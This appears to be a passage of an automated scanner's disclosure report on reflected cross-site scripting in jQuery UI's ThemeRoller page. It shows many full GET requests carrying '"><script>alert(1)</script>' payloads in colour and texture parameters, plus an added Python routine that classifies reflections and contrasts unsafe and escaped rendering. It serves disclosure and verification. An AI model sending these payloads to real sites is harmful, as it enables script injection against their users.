GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8aa"><script>alert(1)</script>a079cdcb31f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74af0"><script>alert(1)</script>33f2ea18869 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
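Each finding above was confirmed the same way: a short random prefix and suffix bracket the `"><script>alert(1)</script>` breakout so that the reflection can be found in a 120 KB response and judged as unmodified rather than encoded or truncated. The following is an added example for this page, not code from the original report or from the jQuery UI project. It reproduces that verification step offline: `render_unsafe()` is a constructed stand-in for the flaw the findings describe (raw concatenation into a double-quoted `value` attribute), `render_escaped()` the corrected version, and the response bodies are constructed, not captured from jqueryui.com.

```python
"""Confirm a reflected-XSS finding from the response body: locate the
canary-bracketed probe, say how it came back, and name the markup context
it landed in.  Added example; the HTML is a constructed stand-in for the
themeroller page, not a real capture.
"""
import html
import re
import secrets

# Attribute-breakout payload used in every finding on this page.
BREAKOUT = '"><script>alert(1)</script>'


def make_probe(prefix=None, suffix=None):
    """Return (prefix, suffix, probe).  Random hex canaries make the
    reflection unique in the response and rule out coincidental matches."""
    prefix = prefix or secrets.token_hex(3)[:5]
    suffix = suffix or secrets.token_hex(6)[:11]
    return prefix, suffix, prefix + BREAKOUT + suffix


def classify_reflection(body, prefix, suffix):
    """How did the probe come back?  'unmodified' is the exploitable case;
    'encoded' means the breakout characters were HTML-escaped."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "partial" if prefix in body else "absent"
    between = m.group(1)
    if between == BREAKOUT:
        return "unmodified"
    if html.unescape(between) == BREAKOUT:
        return "encoded"
    return "partial"


def attribute_context(body, prefix):
    """Inspect the markup just before the first reflection and report the
    syntactic context the payload landed in."""
    idx = body.find(prefix)
    if idx < 0:
        return "absent"
    open_tag = body.rfind("<", 0, idx)
    if open_tag < 0 or ">" in body[open_tag:idx]:
        return "text"  # between tags, not inside one
    inside_tag = body[open_tag:idx]
    if inside_tag.count('"') % 2 == 1:
        return "double-quoted attribute"
    if inside_tag.count("'") % 2 == 1:
        return "single-quoted attribute"
    return "tag"


def render_unsafe(value):
    """Constructed stand-in for the flaw: raw concatenation into value=""."""
    return ('<form><input type="text" name="borderColorActive" value="'
            + value + '" /></form>')


def render_escaped(value):
    """Same markup with attribute encoding applied."""
    return ('<form><input type="text" name="borderColorActive" value="'
            + html.escape(value, quote=True) + '" /></form>')


def demo():
    """Run the classifier over four constructed responses."""
    prefix, suffix, probe = make_probe("74af0", "33f2ea18869")  # canaries from the first finding
    bodies = {
        "unsafe": render_unsafe("aaaaaa" + probe),
        "escaped": render_escaped("aaaaaa" + probe),
        "truncated": render_unsafe("aaaaaa" + probe[:10]),  # server cut the value short
        "dropped": render_unsafe("aaaaaa"),                  # parameter not reflected
    }
    return {name: (classify_reflection(body, prefix, suffix),
                   attribute_context(body, prefix))
            for name, body in bodies.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:10s} {verdict}")
```

The verdict is only meaningful when the response is rendered as HTML, which the `Content-Type: text/html` header on every response above confirms. An "encoded" result is not a finding; a "partial" result (canary present, payload mangled) needs manual follow-up because a filter that strips `<script>` but leaves the closing quote still allows attribute-based payloads.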
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c1"><script>alert(1)</script>9623c246bab was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31115"><script>alert(1)</script>bb5473053cb was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2637"><script>alert(1)</script>983080c5ba4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7baa"><script>alert(1)</script>666b39dfef6 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db7f"><script>alert(1)</script>664d66bb6b3 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aebba"><script>alert(1)</script>f95f6ef0ad9 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e303"><script>alert(1)</script>b0e9e9ddf01 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e89a"><script>alert(1)</script>6b39fffa270 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ed"><script>alert(1)</script>95358923f11 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
